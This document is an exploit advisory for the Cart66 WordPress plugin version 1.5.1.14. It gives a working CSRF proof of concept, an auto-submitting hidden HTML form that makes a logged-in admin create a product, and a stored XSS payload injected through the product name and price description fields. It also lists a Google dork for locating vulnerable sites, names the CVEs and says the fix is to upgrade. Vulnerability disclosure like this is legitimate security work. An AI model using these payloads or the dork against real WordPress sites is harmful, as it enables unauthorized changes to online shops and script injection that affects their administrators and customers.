# Exploit Title: Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities # Exploit Author: absane # Blog: http://blog.noobroot.com # Discovery date: September 29th 2013 # Vendor notified: September 29th 2013 # Vendor fixed: October 12 2013 # Vendor Homepage: http://cart66.com # Software Link: http://downloads.wordpress.org/plugin/cart66-lite.1.5.1.14.zip # Tested on: Wordpress 3.6.1 # Google-dork: inurl:/wp-content/plugins/cart66 # CVE (CSRF): CVE-2013-5977 # CVE (XSS): CVE-2013-5978 Two vulnerabilities were discovered in the Wordpress plugin Cart66 version 1.5.1.14. Vulnerabilities: 1) CSRF 2) Code Injection VULNERABILITY #1 ************ *** CSRF *** ************ Page affected: http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products ================ Proof of Concept ================ <html><body> <form name="csrf_form" action="http://192.168.196.135/wordpress/wp-admin/admin.php?page=cart66-products"; method="post" enctype="multipart/form-data" id="products-form"> <input type="hidden" name="cart66-action" value="save product" /> <input type="hidden" name="product[id]" value="" /> <input class="long" type="hidden" name='product[name]' id='product-name' value='absane was here' /> <input type='hidden' name='product[item_number]' id='product-item_number' value='1337' /> <input type='hidden' id="product-price" name='product[price]' value='13.37' /> <input type='hidden' id="product-price_description" name='product[price_description]' value='LuLz' /> <input type='hidden' id="product-is_user_price" name='product[is_user_price]' value='0' /> <input type="hidden" id="product-min_price" name='product[min_price]' value='' /> <input type="hidden" id="product-max_price" name='product[max_price]' value='' /> <input type='hidden' id="product-taxable" name='product[taxable]' value='0'> <input type='hidden' id="product-shipped" name='product[shipped]' value='1'> <input type="hidden" id="product-weight" name="product[weight]" value="" /> <input type="hidden" id="product-min_qty" name='product[min_quantity]' value='' /> <input type="hidden" id="product-max_qty" name='product[max_quantity]' value='' /> <script type="text/javascript">document.csrf_form.submit();</script> </body></html> VULNERABILITY #2 *********************** *** Code Injection *** *********************** Page affected: http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products in the following input fields: * Product name * Price description ================ Proof of Concept ================ In the vulnerable fields add <script>alert(0)</script> or any other code. The code is placed directly into the database. Input is not sanatized and the code can be executed in ways that depend on the circumstances. During testing, the theme 'iShop 1.0.0' was used and the PoC JavaScript code was executed when I attempted to add a product or modify an existing product. ]....................................[ ]..............SOLUTIONS.............[ ]....................................[ Update to version 1.5.1.15 or greater.
